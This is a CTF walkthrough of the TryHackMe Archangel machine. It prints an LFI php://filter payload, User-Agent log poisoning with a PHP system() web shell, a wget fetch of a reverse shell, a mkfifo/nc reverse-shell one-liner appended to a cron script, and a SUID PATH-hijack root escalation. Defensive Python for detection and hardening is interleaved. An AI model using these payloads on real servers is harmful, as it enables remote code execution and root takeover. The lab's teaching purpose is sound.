TryHackMe-Archangel

Anurag M
6 min read, Feb 5, 2021

Room link :: https://tryhackme.com/room/archangel

Overview

An easy-rated boot2root machine at TryHackMe, created by Archangel. The machine uses virtual domain name hosting. Once the correct domain has been found, you need to exploit the PHP include() function to get LFI and, from there, a reverse shell. After getting the reverse shell, you exploit a cron job to gain privileges as the user. To gain root you exploit the PATH variable.

Enumeration

Carry out a basic nmap scan with the following command:

$ nmap -A <machine-IP>

We can see that two ports are open on the machine: 22 and 80, the standard SSH and HTTP ports.

Let’s take a look at the webpage. At the top of the website you can find a domain name, mafialive.thm.

Let’s add this domain to our /etc/hosts file, pointing to the IP of the machine.

Visit the webpage using the hostname. We get our first flag on the home page.

Further analyzing the website, we find robots.txt, which lists the paths that web crawlers are asked not to index, typically admin pages or assets.

Visiting robots.txt we find a PHP file, test.php.

Accessing test.php provides the following content.

After clicking the button on the webpage, we find that it redirects to mrrobot.php in the directory /var/www/html/development_testing.

This URL hints at the possibility of a Local File Inclusion vulnerability. After trying to access sensitive files such as /etc/passwd and access.log by passing their paths in the view parameter, we find that a check in the PHP code stops us from reading them. The actual source of the included file can still be viewed by having PHP base64-encode it before it is included, using the php://filter stream wrapper with its built-in convert.base64-encode filter, so the PHP code is returned as text instead of being executed. Using the payload below we can read the contents of test.php in base64.

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

We got the base64-encoded PHP file. We need to decode it; we can either use an online decoder or decode it with the following command in a terminal.

$ echo "encoded-string" | base64 -d

This gives us the content of test.php and also the second flag.

Checking the PHP file, we find that the code checks two conditions:

Condition 1

if(!containsStr($_GET['view'], '../..'))

Condition 1 is meant to restrict path traversal; note that it only looks for the literal substring ../..

Condition 2

if(!containsStr($_GET['view'], '/var/www/html/development_testing'))

Condition 2 requires the requested path to contain a single location, i.e. /var/www/html/development_testing.

We can bypass the path traversal check by using “.././../” instead of “../../” to move back up the directory tree, since the literal substring ../.. never appears. Reading the access.log file in /var/log/apache2/ shows that the User-Agent header is being logged, so we can get RCE via a log poisoning attack.
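To make the bypass concrete, here is an added Python model of the two checks (my own code, not the room's PHP; weak_check, hardened_check, resolve and BASE_DIR are names I chose). weak_check mirrors the substring conditions above; hardened_check canonicalizes the path and requires it to stay under the allowed directory, which is what a realpath()-based check in PHP would do.

```python
import posixpath

# Directory the include is supposed to stay within (test.php's second condition)
BASE_DIR = "/var/www/html/development_testing"

def contains_str(haystack, needle):
    """Equivalent of the containsStr() helper: a plain substring test."""
    return needle in haystack

def weak_check(view):
    """Model of test.php's two conditions: reject only if the literal '../..'
    appears, and require the development_testing path to appear somewhere."""
    return (not contains_str(view, "../..")) and contains_str(view, BASE_DIR)

def resolve(view):
    """Collapse '.' and '..' segments the way the filesystem will on open()."""
    return posixpath.normpath(posixpath.join(BASE_DIR, view))

def hardened_check(view):
    """Accept only if the canonical path is still inside BASE_DIR. Stream
    wrappers (php://, data://, ...) and NUL bytes are not filesystem paths and
    are rejected before any path arithmetic. PHP's realpath() gives the same
    canonical form and additionally follows symlinks."""
    if "://" in view or "\x00" in view:
        return False
    resolved = resolve(view)
    return resolved == BASE_DIR or resolved.startswith(BASE_DIR + "/")

if __name__ == "__main__":
    # Constructed inputs: the legitimate include and the two payloads from the writeup
    for v in (BASE_DIR + "/mrrobot.php",
              BASE_DIR + "/.././.././../log/apache2/access.log",
              "php://filter/convert.base64-encode/resource=" + BASE_DIR + "/test.php"):
        print(f"weak={weak_check(v)!s:5} hardened={hardened_check(v)!s:5} {v}")
```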

Now let’s try to access the log file:

view=/var/www/html/development_testing/.././.././../log/apache2/access.log

We are able to access the access.log file; now it’s time to exploit the server using a log poisoning attack to gain a shell.

Let’s pass a malicious PHP code snippet in the User-Agent header.

<?php system($_GET['cmd']); ?>

Use Burp Suite to intercept the request and put the PHP snippet in the User-Agent header value.

Now we can pass Linux commands through the poisoned access.log file; let’s verify using the command below:

view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=id

We can see that our malicious code is working.
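From the defender's side, the poisoned request leaves a clear trail in the same log. This is an added Python detector (my own code, not from the room) that parses Apache combined-format lines and flags the three indicators seen above: a PHP tag in the User-Agent, a stream wrapper in the query, and a traversal sequence after URL-decoding. The lines in SAMPLE_LOG are constructed for the example.

```python
import re
from urllib.parse import unquote

# Apache "combined" format, the layout of /var/log/apache2/access.log
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)      # <?php ... or <?= ...
WRAPPER_RE = re.compile(r"\b(php|data|expect|phar)://", re.IGNORECASE)

# Constructed sample: a normal include, the php://filter read, and the poisoned request
SAMPLE_LOG = """\
10.10.14.2 - - [05/Feb/2021:10:00:01 +0000] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.2 - - [05/Feb/2021:10:00:09 +0000] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php HTTP/1.1" 200 1480 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.2 - - [05/Feb/2021:10:00:31 +0000] "GET /test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=id HTTP/1.1" 200 2048 "-" "<?php system($_GET['cmd']); ?>"
""".splitlines()

def flag_line(line):
    """Indicators found in one access-log line (empty list means clean).
    A line that does not parse is reported rather than silently skipped."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    query = unquote(m.group("req")).partition("?")[2]   # decode %2e%2e%2f etc. first
    found = []
    if PHP_TAG_RE.search(m.group("ua")):
        found.append("php_tag_in_user_agent")           # the log has been poisoned
    if WRAPPER_RE.search(query):
        found.append("stream_wrapper_in_query")         # php://filter source read
    if "../" in query:
        found.append("traversal_in_query")              # .././../ style climb
    return found

def scan(lines):
    """Yield (line_number, indicators) for every suspicious line."""
    for n, line in enumerate(lines, 1):
        hits = flag_line(line.rstrip("\n"))
        if hits:
            yield n, hits

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(n, ", ".join(hits))
```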

Gaining Foothold

Now let’s upload a PHP reverse shell using Burp Suite. The reverse shell can be found here: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Change the IP and PORT where it says //CHANGE THIS, then start a Python web server in that directory:

$ python3 -m http.server 8000

Upload the shell to the target machine using wget through Burp Suite:

view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget http://<local-machine-ip>:8000/shell.php

Now let’s start a netcat listener on our local machine on the port specified in the shell.

$ nc -nvlp 1337

Trigger the shell by visiting http://mafialive.thm/shell.php

Upgrade to a stable shell using the following commands:

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm

Once inside the machine, we find user.txt under the /home/archangel directory.

Post Exploitation Enumeration

Manually enumerating (checking for sudo permissions, SUID binaries and cron jobs), we find an interesting scheduled task which runs every minute as the user archangel.

$ cat /etc/crontab

Check the file’s permissions using:

$ ls -la

We can read and write the file, and it contains a simple bash command echoing “hello world” into /opt/backupfiles/helloworld.txt.

Let’s append a one-liner reverse shell to helloworld.sh using the following command.

$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local-machine-ip> 4444 >/tmp/f" >> helloworld.sh
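An added audit script (my own Python, not part of the room) for the cron weakness used here: it parses /etc/crontab-style entries and reports any absolute path in a command that another account could modify, which is what made helloworld.sh exploitable. make_fixture builds a constructed temp directory and crontab text so the script runs offline.

```python
import os
import stat
import tempfile

def parse_system_crontab(text):
    """Yield (schedule, user, command) from /etc/crontab-style text."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] == "#" or "=" in line.split()[0]:
            continue                        # comment, blank or VAR=value line
        n = 2 if line[0] == "@" else 6      # @reboot-style vs five time fields
        fields = line.split(None, n)
        if len(fields) == n + 1:
            yield " ".join(fields[:n - 1]), fields[n - 1], fields[n]

def writable_by_others(path):
    """Reason if a non-owner could change what this path executes, else None."""
    try:
        st = os.stat(path)
    except OSError:
        return None                         # not an existing filesystem path
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP:
        return "group-writable"
    parent = os.stat(os.path.dirname(path) or "/")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        return "replaceable: parent dir world-writable without sticky bit"
    return None

def audit(crontab_text):
    """(user, path, reason) for each absolute path in a cron command that a non-owner could tamper with."""
    findings = []
    for _schedule, user, command in parse_system_crontab(crontab_text):
        for token in command.split():
            reason = writable_by_others(token) if token.startswith("/") else None
            if reason:
                findings.append((user, token, reason))
    return findings

def make_fixture():
    """Constructed fixture: a 0777 script (the helloworld.sh case), a 0755 one,
    and crontab text that runs each every minute. Returns (crontab, bad, good)."""
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, "helloworld.sh"), os.path.join(d, "backup.sh")
    for p, mode in ((bad, 0o777), (good, 0o755)):
        with open(p, "w") as f:
            f.write("#!/bin/bash\necho hello world\n")
        os.chmod(p, mode)
    return f"PATH=/usr/bin:/bin\n* * * * * archangel /bin/bash {bad}\n* * * * * root {good}\n", bad, good
```

Run against a real /etc/crontab (and the files under /etc/cron.d) the same audit flags any script that a low-privilege account such as the web server user could edit.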

Privilege Escalation

Start the netcat listener on your local machine and wait for a few minutes.

Again, upgrade your shell to a stable one with the following commands.

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm

There is the flag we already got, and also a folder named secret in the home directory. Changing directory into secret gives us the flag for user2.

There is also a binary called backup which has the SUID bit set. Let’s start a web server on the remote machine and download this binary to our local machine using wget, with the following commands.

Start the web server:

$ python3 -m http.server 8001

Download the binary using wget:

$ wget http://<remote-machine-ip>:8001/backup

Analyzing the binary in Ghidra, we get the following in the main function.

The binary executes a cp command to copy files from one directory to another, and because of the SUID bit it runs as root. This means that if we can replace the system cp binary with our own, we can get root access.

Let’s create our own binary named cp and prepend our directory to $PATH.

$ echo "/bin/bash" >> cp
$ chmod +x cp

Set the PATH variable using:

$ export PATH=$PWD:$PATH

And now execute backup

$ ./backup

And we are root now. Find the root flag in the /root directory.

$ cd /root
$ cat root.txt
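To show the mechanism behind the PATH hijack and the corresponding fix, an added Python example (my own, not the backup binary's code): hijack_demo prepends a temp dir holding an inert fake cp to PATH and shows where cp resolves under the caller's PATH versus a pinned one, and safe_copy is the hardened pattern (absolute path, argv list, scrubbed environment) that a setuid program should use instead of system("cp ..."). SAFE_PATH and the /bin/cp location are assumptions.

```python
import os
import shutil
import subprocess
import tempfile

SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"   # assumed pinned search path

def resolve_command(name, path_value):
    """Where a bare command name resolves under a given PATH: the lookup
    /bin/sh performs when a program calls system("cp ...")."""
    return shutil.which(name, path=path_value)

def hijack_demo():
    """Constructed setup mirroring 'export PATH=$PWD:$PATH': a temp dir with an
    inert fake 'cp' is prepended to PATH. Returns what 'cp' resolves to under
    that PATH versus a pinned PATH, plus the fake's location."""
    d = tempfile.mkdtemp()
    fake = os.path.join(d, "cp")
    with open(fake, "w") as f:
        f.write("#!/bin/sh\necho fake cp\n")   # stand-in; only prints a line
    os.chmod(fake, 0o755)
    caller_path = d + os.pathsep + os.environ.get("PATH", SAFE_PATH)
    return {"fake": fake,
            "caller_path": resolve_command("cp", caller_path),
            "pinned_path": resolve_command("cp", SAFE_PATH)}

def safe_env():
    """Environment a setuid program should build before spawning anything:
    discard the caller's PATH and loader (LD_*) variables, pin a known PATH."""
    env = {k: v for k, v in os.environ.items() if not k.startswith("LD_")}
    env["PATH"] = SAFE_PATH
    return env

def safe_copy(src, dst):
    """Hardened form of what backup does: absolute path, argv list (no shell),
    scrubbed environment. Returns False if /bin/cp is not present."""
    if not os.path.exists("/bin/cp"):
        return False
    subprocess.run(["/bin/cp", src, dst], env=safe_env(), check=True)
    return True

def safe_copy_demo():
    """Copy a constructed file with safe_copy and verify the bytes; None if no /bin/cp."""
    d = tempfile.mkdtemp()
    src, dst = os.path.join(d, "in.txt"), os.path.join(d, "out.txt")
    with open(src, "w") as f:
        f.write("backup me\n")
    if not safe_copy(src, dst):
        return None
    with open(dst) as f:
        return f.read() == "backup me\n"
```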

Thank You!!

If you have any suggestions, let me know in the comments and follow me on my socials.
